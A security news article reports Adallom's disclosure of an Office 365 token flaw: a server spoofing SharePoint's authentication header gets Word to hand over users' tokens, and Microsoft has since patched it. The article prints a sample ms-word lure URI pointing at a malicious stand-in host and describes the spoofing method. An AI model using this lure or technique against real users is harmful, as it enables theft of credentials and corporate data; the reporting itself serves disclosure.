Security Affairs
U.S. Government Agency Paid $1M to Data Extortion Group Kairos|FBI: TeamPCP Compromised Dev Tools to Steal Cloud Credentials|Pegasus Used Against MEP Investigating Pegasus, Citizen Lab Finds|JADEPUFFER: First End-to-End AI-Driven Ransomware Operation|The Anatomy of a Shadow AI Supply-Chain Breach: Lessons from the 2026 Vercel Incident|Law enforcememt operation disrupted Malicious Residential Proxy Networks NetNut|Government and Healthcare Are the Weakest Links in Global Email Security|Europe Confirms Record €4.1B Penalty Against Google for Android Practices|U.S. CISA adds a Microsoft SharePoint Server flaw to its Known Exploited Vulnerabilities catalog|430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|Adobe fixed multiple maximum-severity flaws in ColdFusion and Campaign Classic|Alleged Scattered Spider Hacker Extradited to U.S. to Face Cybercrime Charges|U.S. Government Agency Paid $1M to Data Extortion Group Kairos|FBI: TeamPCP Compromised Dev Tools to Steal Cloud Credentials|Pegasus Used Against MEP Investigating Pegasus, Citizen Lab Finds|JADEPUFFER: First End-to-End AI-Driven Ransomware Operation|The Anatomy of a Shadow AI Supply-Chain Breach: Lessons from the 2026 Vercel Incident|Law enforcememt operation disrupted Malicious Residential Proxy Networks NetNut|Government and Healthcare Are the Weakest Links in Global Email Security|Europe Confirms Record €4.1B Penalty Against Google for Android Practices|U.S. CISA adds a Microsoft SharePoint Server flaw to its Known Exploited Vulnerabilities catalog|430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|Adobe fixed multiple maximum-severity flaws in ColdFusion and Campaign Classic|Alleged Scattered Spider Hacker Extradited to U.S. to Face Cybercrime Charges|
Advertisement

Ad Placeholder

Full Width × 90

Hacking

Adallom discovered an important Office 365 Token Disclosure Vulnerability

Adallom demonstrated that exploiting an Office 365 Token Disclosure Vulnerability an attacker can steal organisations SharePoint credentials. Adallom chief software architect Noam Liran published a very interesting post on a severe Office 365 Token Disclosure Vulnerability, the researcher demonstrated how an attacker can steal Microsoft Office 365 credentials if victims host a Word document on their […]

Adallom discovered an important Office 365 Token Disclosure Vulnerability

Adallom demonstrated that exploiting an Office 365 Token Disclosure Vulnerability an attacker can steal organisations SharePoint credentials.

Adallom chief software architect Noam Liran published a very interesting post on a severe Office 365 Token Disclosure Vulnerability, the researcher demonstrated how an attacker can steal Microsoft Office 365 credentials if victims host a Word document on their webserver.

The flaw is related to the authentication method implemented by cloud service, Office 365 requests users to log in to their account to access to their online storage, and when users need to download a document from a SharePoint server, it verifies the credentials of the currently logged-in user by sending an authentication token.

Be aware, the authentication token is sent only if the server is deployed on the sharepoint.com domain, but the researcher at Adallom discovered that by running his own server and replying with responses that would be expected of a legitimate SharePoint server, the user’s computer would send the authentication token anyway.

 

blog office 365 sponline word dialog

To prof the flaw  Liran wrote a really simple web server that plays back the same authentication responses provided by SharePoint Online to Word, keeping the WWW-Authenticate header with RootDomain=”sharepoint.com”. The cool thing is the the research has done it up under a domain name which isn’t sharepoint.com.

 ms-word:ofe|u|https://my.malicious.site.com/malicious.docx

“Word regarded my web server as the quintessential sharepoint.com, and sent its Office 365 token towards my malicious web server, solely based on the this frivolous WWW-Authenticate header that said I was sharepoint.com.

My web server, programmed to work just like the original SharePoint site, gave Word a cookie for accessing SharePoint and then gave Word the document it wanted. And it was flawless. Invisible. (Gruesome.)  Now, my malicious web server, in possession of your private Office 365 authentication token, can simply go to your organization’s SharePoint Online site, download all of it, modify it or do whatever it wants, and you will never know about it. In fact, you won’t even know you got hit! It’s the perfect crime.” he wrote.

Below the proof of concept video demonstrating how authentication tokens can be easily stolen.

 

Adallom has collaborated with Microsoft to discovery the flaw in Office 365 and to reproduce it, Microsoft has rated the vulnerability as important and issued a specific security bulletin.

“This security update resolves one privately reported vulnerability in Microsoft Office that could allow information disclosure if a user attempts to open an Office file hosted on a malicious website. An attacker who successfully exploited this vulnerability could ascertain access tokens used to authenticate the current user on a targeted SharePoint or other Microsoft Office server site. This security update is rated Important for supported editions of Microsoft Office 2013 and Microsoft Office 2013 RT software. ” states the advisory.

The patche for the Office 365 Token Disclosure Vulnerability wea released earlier this month.

Pierluigi Paganini

(Security Affairs –  Office 365, vulnerability)